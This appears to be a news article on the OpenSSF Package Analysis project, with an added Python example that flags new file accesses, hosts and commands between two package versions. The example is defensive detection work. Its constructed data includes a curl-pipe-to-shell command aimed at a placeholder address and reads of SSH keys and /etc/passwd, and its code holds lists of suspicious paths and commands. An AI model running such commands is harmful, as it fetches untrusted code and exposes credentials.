Malicious Packages in Open-Source Repositories

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories.

Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

"The Package Analysis project seeks to understand the behavior and capabilities of packages available on open source repositories: what files do they access, what addresses do they connect to, and what commands do they run?" the OpenSSF said.

"The project also tracks changes in how packages behave over time, to identify when previously safe software begins acting suspiciously," the foundation's Caleb Brown and David A. Wheeler added.
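The two quotes above describe the core idea: record what a package does in a sandbox (files, network destinations, commands) and compare that record across versions so that a previously quiet package that suddenly reads SSH keys or phones home stands out. The following is an added example, not code from the OpenSSF Package Analysis project; the report layout, the package name "examplepkg", the file paths and the 203.0.113.7 address are all constructed for illustration, and the indicator lists are assumptions about what a reviewer would treat as suspicious.

```python
"""Diff two sandbox behaviour reports for the same package and flag new capabilities.

Added example: the JSON layout below is an assumed format, not the schema
used by the OpenSSF Package Analysis project.
"""
import json

# Constructed reports for two versions of a hypothetical package. Version 1.0.0
# only talks to the index and runs its installer; 1.0.1 adds credential reads
# and a download-and-execute command pointing at a made-up address.
REPORT_V1 = json.loads("""
{
  "package": "examplepkg", "version": "1.0.0",
  "files": ["/app/setup.py", "/usr/lib/python3/dist-packages/requests/__init__.py"],
  "hosts": ["pypi.org:443"],
  "commands": ["python setup.py install"]
}
""")

REPORT_V2 = json.loads("""
{
  "package": "examplepkg", "version": "1.0.1",
  "files": ["/app/setup.py", "/root/.ssh/id_rsa", "/etc/passwd"],
  "hosts": ["pypi.org:443", "203.0.113.7:8080"],
  "commands": ["python setup.py install", "curl -s http://203.0.113.7:8080/x | sh"]
}
""")

# Assumed indicators: paths that an installer has no business touching, and
# command fragments typical of a stager that fetches a second-stage payload.
SENSITIVE_FILE_PREFIXES = ("/root/.ssh", "/home/", "/etc/passwd", "/etc/shadow", "/proc/")
DOWNLOAD_EXEC_MARKERS = ("| sh", "| bash", "curl ", "wget ")


def diff_behaviour(old, new):
    """Return, per category, the items seen in `new` that never appeared in `old`."""
    return {
        key: sorted(set(new.get(key, [])) - set(old.get(key, [])))
        for key in ("files", "hosts", "commands")
    }


def classify(delta):
    """Turn a behaviour delta into human-readable findings."""
    findings = []
    for path in delta["files"]:
        if path.startswith(SENSITIVE_FILE_PREFIXES):
            findings.append(f"new access to sensitive file: {path}")
    for host in delta["hosts"]:
        # Any new destination is reportable; a bare IP rather than a hostname is worth calling out.
        kind = "raw IP" if host[0].isdigit() else "host"
        findings.append(f"new network destination ({kind}): {host}")
    for cmd in delta["commands"]:
        if any(marker in cmd for marker in DOWNLOAD_EXEC_MARKERS):
            findings.append(f"new download-and-execute command: {cmd}")
        else:
            findings.append(f"new command: {cmd}")
    return findings


def analyse(old, new):
    """Full pipeline: diff the two reports, then classify what changed."""
    return classify(diff_behaviour(old, new))


if __name__ == "__main__":
    for finding in analyse(REPORT_V1, REPORT_V2):
        print(finding)
```

Only additions are reported: dropping a behaviour is rarely interesting, while a new credential read or a new outbound destination is exactly the "previously safe software begins acting suspiciously" signal the project is after. In practice the baseline would be the last known-good report for the package rather than simply the previous version.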

In a test run that lasted a month, the tool identified more than 200 malicious packages uploaded to PyPI and NPM, with a majority of the rogue libraries leveraging dependency confusion and typosquatting attacks.

Google, which is a member of OpenSSF, has also rallied its support behind the Package Analysis project, while emphasizing the need for "vetting packages being published in order to keep users safe."


Last year, the tech giant's Open Source Security Team put forth a framework called Supply-chain Levels for Software Artifacts (SLSA) to ensure the integrity of software packages and prevent unauthorized modifications along the build and release path.

The development comes as the open source ecosystem is being increasingly weaponized to target developers with a variety of malware, including cryptocurrency miners and information stealers.
